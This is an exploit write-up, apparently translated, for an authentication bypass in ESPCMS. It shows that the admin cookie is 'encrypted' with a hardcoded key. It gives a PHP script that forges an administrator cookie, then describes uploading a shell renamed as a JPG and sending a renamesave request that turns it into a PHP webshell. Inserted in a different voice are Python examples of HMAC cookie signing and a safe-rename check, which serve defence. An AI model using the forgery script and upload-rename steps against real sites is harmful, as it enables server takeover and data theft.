Earlier versions were not tested; the test was done against the latest version. Google: Powered by ESPCMS. The process is a bit involved, but read it patiently and it will make sense.

Look at the code under "adminsoft\control": the files there are the backend files, and each one starts with $this->softbase(true), which loads the basic data. See:

Quoted fragment:

function softbase($admin_purview=false) {
        header("Content-Type: text/html; charset=utf-8");
        $this->dbmysql();
        $this->commandinc();
        $this->systemfile();
        $this->cachedb();
        if ($admin_purview) {
                $this->admin_purview(); // login-state check, run only when called with true
        }
}

admin_purview is what checks the login state.
Next, look at:

function admin_purview() {
        // for the batch-upload save the values are read from the request ('G'), otherwise from cookies ('C')
        if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') {
                $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'G');
                $esp_powerlist = $this->fun->accept('esp_powerlist', 'G');
                $gettype = false;
        } else {
                $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C');
                $esp_powerlist = $this->fun->accept('esp_powerlist', 'C');
                $gettype = true;
        }

        $arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE')); // everything else is unimportant; this is the key part. by Black Boy

        $this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'DECODE'));

        list($this->esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $this->esp_powerid, $this->esp_inputclassid, $this->esp_softurl) = $arr_purview;
        if ($gettype) {
                // checks whether these values are present: if they are, the check passes; if not, back to the login page. The rest is simple and not explained. Black Boy
                if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) {
                        $condition = 0;
                } else {
                        $condition = 1;
                }
        } else {
                if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_ClassURL) != $this->esp_softurl) {
                        $condition = 0;
                } else {
                        $condition = 1;
                }
        }
        if ($condition == 0) {
                if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') {
                        header('location: index.php?archive=adminuser&action=login');
                        exit();
                }
        } else {
                if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == '' && $this->fun->accept('action', 'R') == '') {
                        header('location: index.php?archive=management&action=tab&loadfun=mangercenter');
                        exit();
                }
        }
}

So the most important thing now is the eccode encryption scheme.
Look at the code:


function eccode($string, $operation='DECODE', $key='@LFK24s224%@safS3s%1f%') {
        $result = '';
        if ($operation == 'ENCODE') {
                // add one key byte to each input byte, then URL-safe base64 without padding
                for ($i = 0; $i < strlen($string); $i++) {
                        $char = substr($string, $i, 1);
                        // when $i % strlen($key) == 0 the start is -1, so substr() returns the last key byte
                        $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                        $char = chr(ord($char) + ord($keychar));
                        $result .= $char;
                }
                $result = base64_encode($result);
                $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
        } elseif ($operation == 'DECODE') {
                // undo the URL-safe substitutions, restore padding, then subtract the same key bytes
                $data = str_replace(array('-', '_'), array('+', '/'), $string);
                $mod4 = strlen($data) % 4;
                if ($mod4) {
                        $data .= substr('====', $mod4);
                }
                $string = base64_decode($data);
                for ($i = 0; $i < strlen($string); $i++) {
                        $char = substr($string, $i, 1);
                        $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                        $char = chr(ord($char) - ord($keychar));
                        $result .= $char;
                }
        }
        return $result;
}

Obviously there is no need to write a decryptor; simply running the function in reverse is enough, and working the encryption out step by step by hand would be a lot of effort.
The core vulnerability is that $key='@LFK24s224%@safS3s%1f%'
is a fixed constant rather than randomly generated.
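Why a key that lives in the source is equivalent to no check, and the standard fix, as an added example that is not ESPCMS code: an HMAC over the same seven fields, keyed with a random per-installation secret kept in config, makes any value produced without that secret, or edited after signing, fail verification. The field names follow the list() call in admin_purview(); the secret and sample admin record are constructed.

```python
import base64
import binascii
import hashlib
import hmac

# The seven fields ESPCMS packs into ecisp_admininfo, in the order
# admin_purview() unpacks them.
FIELDS = ("adminuserid", "username", "password", "useragent",
          "powerid", "inputclassid", "softurl")

def b64url(data: bytes) -> str:
    """URL-safe base64 without '=' padding, the same alphabet eccode() emits."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_admininfo(info: dict, secret: bytes) -> str:
    """Serialize the fields and append an HMAC-SHA256 tag.
    `secret` must be a random per-install value stored in config, never a
    constant in the source: a constant key is exactly the eccode() bug."""
    payload = "|".join(str(info[f]) for f in FIELDS).encode()
    tag = hmac.new(secret, payload, hashlib.sha256).digest()
    return b64url(payload) + "." + b64url(tag)

def verify_admininfo(cookie: str, secret: bytes):
    """Return the parsed fields, or None if the cookie was not minted with
    `secret` (wrong key, edited payload, or malformed value)."""
    try:
        p_b64, t_b64 = cookie.split(".", 1)
        payload, tag = b64url_decode(p_b64), b64url_decode(t_b64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(secret, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    parts = payload.decode(errors="replace").split("|")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

# Constructed sample: a per-install secret and one admin's fields.
INSTALL_SECRET = b"constructed-random-secret-from-config"
SAMPLE_ADMIN = dict(adminuserid="1", username="admin",
                    password="constructed-password-hash",
                    useragent="constructed-ua-md5", powerid="1",
                    inputclassid="1", softurl="constructed-url-md5")
```

Storing the password hash in the cookie at all is unnecessary once the tag binds the fields; a server-side session keyed by an opaque random id removes the field list from the client entirely.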

Exp:

<?php
function eccode($string, $operation='DECODE', $key='@LFK24s224%@safS3s%1f%') {
        $result = '';
        if ($operation == 'ENCODE') {
                for ($i = 0; $i < strlen($string); $i++) {
                        $char = substr($string, $i, 1);
                        $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                        $char = chr(ord($char) + ord($keychar));
                        $result .= $char;
                }
                $result = base64_encode($result);
                $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);
        } elseif ($operation == 'DECODE') {
                $data = str_replace(array('-', '_'), array('+', '/'), $string);
                $mod4 = strlen($data) % 4;
                if ($mod4) {
                        $data .= substr('====', $mod4);
                }
                $string = base64_decode($data);
                for ($i = 0; $i < strlen($string); $i++) {
                        $char = substr($string, $i, 1);
                        $keychar = substr($key, ($i % strlen($key)) - 1, 1);
                        $char = chr(ord($char) - ord($keychar));
                        $result .= $char;
                }
        }
        return $result;
}
define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']);
$name = isset($_POST['name']) ? $_POST['name'] : '';
$s = md5(admin_AGENT);
// the same seven '|'-separated fields admin_purview() unpacks: adminuserid, username, password hash, md5(user agent), powerid, inputclassid, md5(adminsoft URL)
$ecisp_admininfo = '1|admin|e00cf25ad42683b3df678c61f42c6bda|' . $s . '|1|1|' . md5("http://" . $name . "/adminsoft");
$a = eccode($ecisp_admininfo, 'ENCODE');
echo "ecisp_admininfo=" . $a . ";esp_powerlist=hqy4;" . "<br><br><br>";
?>

<form method="post" action="http://www.hackersb.com/sb/test.php" enctype="multipart/form-data" id="upload">
  <label>
  <input name="name" type="text" value="www.t00ls.net" />      by:Black Boy  www.hackersb.com
  </label>
    <div></div>
<input name="respondids" value="给我COOKIES " class="coolbg np" type="submit">
</form>

Note: $s is the current browser version; whichever browser you run this program in, use that same browser to do the spoofing.

Once you have the COOKIES, edit and spoof them to get into the backend. Then add content and upload a file, renaming the shell to JPG before uploading.

Finally, POST:

/adminsoft/index.php?archive=filemanage&action=renamesave

path=/upfile/&dirname=product.jpg&newdirnam=1.php

product.jpg is the JPG shell file after upload; the webshell ends up at upfile/1.php
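The rename step above is the point where an uploaded image becomes executable, so the file manager's rename handler is where the check belongs. This added example (not ESPCMS code) validates a renamesave-style request: the new name must keep an allowlisted extension in every dotted segment, both names must be bare basenames, and the resolved directory must stay under an assumed file-manager root.

```python
import posixpath

# Assumed: the file manager is rooted here and receives the same
# path / dirname / newdirname fields as the request shown above.
FILES_ROOT = "/var/www/html"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "zip"}

def safe_rename(path: str, dirname: str, newdirname: str):
    """Return (src, dst) absolute paths if the rename is acceptable, else None.
    Refuses path traversal, names containing separators, and any new name
    that would gain a non-allowlisted extension, so product.jpg -> 1.php
    is rejected."""
    for name in (dirname, newdirname):
        if (not name or name in (".", "..")
                or name != posixpath.basename(name)):
            return None
    # Every dotted segment after the first must be allowlisted; this also
    # refuses shell.php.jpg, which some server configurations hand to PHP.
    segs = newdirname.lower().split(".")
    if len(segs) < 2 or any(s not in ALLOWED_EXT for s in segs[1:]):
        return None
    base = posixpath.normpath(posixpath.join(FILES_ROOT, path.lstrip("/")))
    if base != FILES_ROOT and not base.startswith(FILES_ROOT + "/"):
        return None
    return (posixpath.join(base, dirname), posixpath.join(base, newdirname))
```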